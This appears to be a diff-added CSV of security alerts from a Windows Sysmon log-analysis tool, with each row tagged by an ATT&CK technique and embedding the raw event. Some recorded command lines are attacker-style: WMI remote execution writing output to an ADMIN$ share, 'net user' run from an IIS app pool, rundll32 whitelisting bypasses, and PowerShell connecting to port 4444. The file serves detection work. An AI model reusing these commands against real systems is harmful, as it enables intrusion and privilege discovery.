+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-05-24 01:33:53.152
+ 365ABB72-4A01-5CE7-0000-00102DA1AC00
+ 788
+ C:\Windows\System32\net.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Net Command
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ net user
+ c:\windows\system32\inetsrv\
+ IIS APPPOOL\DefaultAppPool
+ 365ABB72-45C7-5CE7-0000-002092F99C00
+ 0x9cf992
+ 0
+ High
+ SHA1=9A544E2094273741AA2D3E7EA0AF303AF2B587EA,MD5=B9A4DAC2192FD78CDA097BFA79F6E7B2,SHA256=D468E6B1B79555AC8BCE0300942FD479689EB8F159F3A399848D3BF9B9990A56,IMPHASH=B1F584304D1C7F2899A954905D8318C7
+ 365ABB72-4A01-5CE7-0000-0010EE9DAC00
+ 2404
+ C:\Windows\System32\cmd.exe
+ "c:\windows\system32\cmd.exe" /c net user
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1607121664.542909,2020-12-05T02:41:04.542909+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 549016
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-12-04 22:41:04.465
+ 747F3D96-BB00-5FCA-0000-001033CD7600
+ 8536
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k localService -p -s RemoteRegistry
+ C:\Windows\system32\
+ NT AUTHORITY\LOCAL SERVICE
+ 747F3D96-3407-5FCB-0000-0020E5030000
+ 0x3e5
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 612
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1579034803.8364,2020-01-15T00:46:43.836400+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "cmd.exe" /c notepad.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 341
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:46:43.675
+ 747F3D96-28B3-5E1E-0000-001032047C00
+ 1656
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ "cmd.exe" /c notepad.exe
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-28B3-5E1E-0000-002057EB7B00
+ 0x7beb57
+ 0
+ High
+ SHA1=08CC2E8DCA652BDDA1ACCA9C446560D4BC1BCDF9,MD5=0D088F5BCFA8F086FBA163647CD80CAB,SHA256=9023F8AAEDA4A1DA45AC477A81B5BBE4128E413F19A0ABFA3715465AD66ED5CD,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-28B3-5E1E-0000-00101DF17B00
+ 3412
+ C:\Windows\System32\rundll32.exe
+ rundll32 url.dll,OpenURL ms-browser://
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[ T1086 ] Powershell with Suspicious Argument,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,Critical,"Found User (IEWIN7\IEUser) run Suspicious PowerShell commands that include (powershell,\Windows\System32,powershell) in event with Command Line ("C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile) and Parent Image :C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , Parent CommandLine (powershell) in directory : ( C:\Users\IEUser\Desktop\invoke-pipeshell-master\ )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8048
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-29 20:59:21.539
+ 365ABB72-65A9-5CC7-0000-00104E5C2400
+ 3376
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
+ C:\Users\IEUser\Desktop\invoke-pipeshell-master\
+ IEWIN7\IEUser
+ 365ABB72-5B3A-5CC7-0000-002096080100
+ 0x10896
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-6231-5CC7-0000-00104CF71800
+ 3940
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1618950794.860901,2021-04-21T00:33:14.860901+04:00,,Threat,Low,Found User (NT AUTHORITY\LOCAL SERVICE) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 578505
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-04-20 20:33:14.246
+ 747F3D96-3A8A-607F-0000-0010E4717700
+ 5280
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost
+ C:\Windows\system32\
+ NT AUTHORITY\LOCAL SERVICE
+ 747F3D96-82AF-607F-0000-0020E5030000
+ 0x3e5
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 612
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237538.260138,2020-08-12T17:05:38.260138+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342407
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:05:16.721
+ 747F3D96-E90C-5F33-0000-0010CB420200
+ 3320
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ cmd.exe
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E909-5F33-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E909-5F33-0000-00108C580000
+ 612
+ C:\Windows\System32\services.exe
+ C:\Windows\system32\services.exe
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1086] PowerShell Process found,1556571561.539311,2019-04-30T00:59:21.539311+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) through command line ( "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 8048
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-29 20:59:21.539
+ 365ABB72-65A9-5CC7-0000-00104E5C2400
+ 3376
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ 6.1.7600.16385 (win7_rtm.090713-1255)
+ Windows PowerShell
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
+ C:\Users\IEUser\Desktop\invoke-pipeshell-master\
+ IEWIN7\IEUser
+ 365ABB72-5B3A-5CC7-0000-002096080100
+ 0x10896
+ 1
+ High
+ SHA1=04C5D2B4DA9A0F3FA8A45702D4256CEE42D8C48D,MD5=92F44E405DB16AC55D97E3BFE3B132FA,SHA256=6C05E11399B7E3C8ED31BAE72014CF249C144A8F4A2C54A758EB2E6FAD47AEC7,IMPHASH=96BA691B035D05F44E35AB23F6BA946C
+ 365ABB72-6231-5CC7-0000-00104CF71800
+ 3940
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ powershell
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656513.512339,2019-05-01T00:35:13.512339+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9838
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:35:13.434
+ 365ABB72-B181-5CC8-0000-0010ADBF1E00
+ 3372
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ "C:\Windows\System32\cmd.exe" /Q /c cd 1> \\127.0.0.1\ADMIN$\__1556656511.61 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B17F-5CC8-0000-0020C6A31E00
+ 0x1ea3c6
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B17F-5CC8-0000-001082A51E00
+ 3572
+ C:\Windows\System32\mmc.exe
+ C:\Windows\system32\mmc.exe -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,Low,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9828
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.324
+ 365ABB72-B0F3-5CC8-0000-0010C43A1D00
+ 2828
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9828
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.324
+ 365ABB72-B0F3-5CC8-0000-0010C43A1D00
+ 2828
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1556656371.371714,2019-05-01T00:32:51.371714+04:00,,Threat,High,Found User (IEWIN7\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1 ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 9828
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:32:51.324
+ 365ABB72-B0F3-5CC8-0000-0010C43A1D00
+ 2828
+ C:\Windows\System32\cmd.exe
+ 6.1.7601.17514 (win7sp1_rtm.101119-1850)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ cmd.exe /Q /c whoami /all 1> \\127.0.0.1\ADMIN$\__1556656369.7 2>&1
+ C:\
+ IEWIN7\IEUser
+ 365ABB72-B0F2-5CC8-0000-00203D311D00
+ 0x1d313d
+ 0
+ High
+ SHA1=EE8CBF12D87C4D388F09B4F69BED2E91682920B5,MD5=AD7B9C14083B52BC532FBA5948342B98,SHA256=17F746D82695FA9B35493B41859D39D786D32B23A9D2E00F4011DEC7A02402AE,IMPHASH=CEEFB55F764020CC5C5F8F23349AB163
+ 365ABB72-B0C0-5CC8-0000-001017C31C00
+ 836
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+Prohibited Process connecting to internet,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,Critical,"User (NT AUTHORITY\SYSTEM) run process C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe and initiated network connection from hostname ( IEWIN7 and IP ( 10.0.2.18 ) to hostname ( ) , IP ( 10.0.2.19 ) and port ( 4444 )",3,"
+
+
+
+
+ 3
+ 5
+ 4
+ 3
+ 0
+ 0x8000000000000000
+
+
+ 9813
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ IEWIN7
+
+
+
+
+
+ 2019-04-30 20:26:52.794
+ 365ABB72-AF8C-5CC8-0000-001003361900
+ 2484
+ C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
+ NT AUTHORITY\SYSTEM
+ tcp
+ true
+ false
+ 10.0.2.18
+ IEWIN7
+ 49160
+
+ false
+ 10.0.2.19
+
+ 4444
+
+
+",IEWIN7,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 url.dll,OpenURL ms-browser://)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 340
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:46:43.232
+ 747F3D96-28B3-5E1E-0000-00101DF17B00
+ 3412
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,OpenURL ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-28B3-5E1E-0000-002057EB7B00
+ 0x7beb57
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-28B3-5E1E-0000-0010CAEC7B00
+ 1632
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1053] Scheduled Task - Process,1618950794.242705,2021-04-21T00:33:14.242705+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\svchost.exe ) through command line ( C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 578503
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2021-04-20 20:33:13.680
+ 747F3D96-3A89-607F-0000-001028587700
+ 4912
+ C:\Windows\System32\svchost.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Host Process for Windows Services
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-82AE-607F-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=A1385CE20AD79F55DF235EFFD9780C31442AA234,MD5=8A0A29438052FAED8A2532DA50455756,SHA256=7FD065BAC18C5278777AE44908101CDFED72D26FA741367F0AD4D02020787AB6,IMPHASH=247B9220E5D9B720A82B2C8B5069AD69
+ 00000000-0000-0000-0000-000000000000
+ 612
+ ?
+ ?
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+"[T1117] Bypassing Application Whitelisting with Regsvr32,rundll32,certutil or scrobj ",1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 340
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:46:43.232
+ 747F3D96-28B3-5E1E-0000-00101DF17B00
+ 3412
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,OpenURL ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-28B3-5E1E-0000-002057EB7B00
+ 0x7beb57
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-28B3-5E1E-0000-0010CAEC7B00
+ 1632
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1085] Rundll32 Execution detected,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 340
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:46:43.232
+ 747F3D96-28B3-5E1E-0000-00101DF17B00
+ 3412
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,OpenURL ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-28B3-5E1E-0000-002057EB7B00
+ 0x7beb57
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-28B3-5E1E-0000-0010CAEC7B00
+ 1632
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1059] Command-Line Interface,1597237536.555348,2020-08-12T17:05:36.555348+04:00,,Threat,Low,Found User (NT AUTHORITY\SYSTEM) running image ( C:\Windows\System32\cmd.exe ) through command line ( C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat"" ),1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 342406
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-08-12 13:05:14.798
+ 747F3D96-E90A-5F33-0000-0010863C0100
+ 1740
+ C:\Windows\System32\cmd.exe
+ 10.0.17763.592 (WinBuild.160101.0800)
+ Windows Command Processor
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ Cmd.Exe
+ C:\Windows\SYSTEM32\cmd.exe /c ""C:\Program Files\Npcap\CheckStatus.bat""
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-E909-5F33-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18
+ 747F3D96-E90A-5F33-0000-00102CF20000
+ 1180
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1117] Bypassing Application Whitelisting,1584766825.513362,2020-03-21T09:00:25.513362+04:00,,Threat,High,"[T1117] Bypassing Application Whitelisting , Process ( C:\Windows\System32\rundll32.exe) with commandline ( rundll32 windowscoredeviceinfo.dll,CreateBackdoor)",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 243562
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-03-21 05:00:25.488
+ 747F3D96-9F69-5E75-0000-00105B9A2000
+ 2028
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 windowscoredeviceinfo.dll,CreateBackdoor
+ C:\Windows\system32\
+ NT AUTHORITY\SYSTEM
+ 747F3D96-9DBA-5E75-0000-0020E7030000
+ 0x3e7
+ 0
+ System
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-9DBC-5E75-0000-00102C390100
+ 1652
+ C:\Windows\System32\svchost.exe
+ C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 340
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:46:43.232
+ 747F3D96-28B3-5E1E-0000-00101DF17B00
+ 3412
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,OpenURL ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-28B3-5E1E-0000-002057EB7B00
+ 0x7beb57
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-28B3-5E1E-0000-0010CAEC7B00
+ 1632
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
+[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1579034803.819347,2020-01-15T00:46:43.819347+04:00,,Threat,High,"Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\rundll32.exe ) through command line ( rundll32 url.dll,OpenURL ms-browser:// )",1,"
+
+
+
+
+ 1
+ 5
+ 4
+ 1
+ 0
+ 0x8000000000000000
+
+
+ 340
+
+
+
+
+ Microsoft-Windows-Sysmon/Operational
+ MSEDGEWIN10
+
+
+
+
+
+ 2020-01-14 20:46:43.232
+ 747F3D96-28B3-5E1E-0000-00101DF17B00
+ 3412
+ C:\Windows\System32\rundll32.exe
+ 10.0.17763.1 (WinBuild.160101.0800)
+ Windows host process (Rundll32)
+ Microsoft® Windows® Operating System
+ Microsoft Corporation
+ RUNDLL32.EXE
+ rundll32 url.dll,OpenURL ms-browser://
+ C:\Windows\system32\
+ MSEDGEWIN10\IEUser
+ 747F3D96-28B3-5E1E-0000-002057EB7B00
+ 0x7beb57
+ 0
+ High
+ SHA1=F3BA3415DD068A8871F285570BEA2E29874CBFF1,MD5=C73BA51880F5A7FB20C84185A23212EF,SHA256=01B407AF0200B66A34D9B1FA6D9EAAB758EFA36A36BB99B554384F59F8690B1A,IMPHASH=F27A7FC3A53E74F45BE370131953896A
+ 747F3D96-28B3-5E1E-0000-0010CAEC7B00
+ 1632
+ C:\Windows\System32\wbem\WmiPrvSE.exe
+ C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
+
+",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
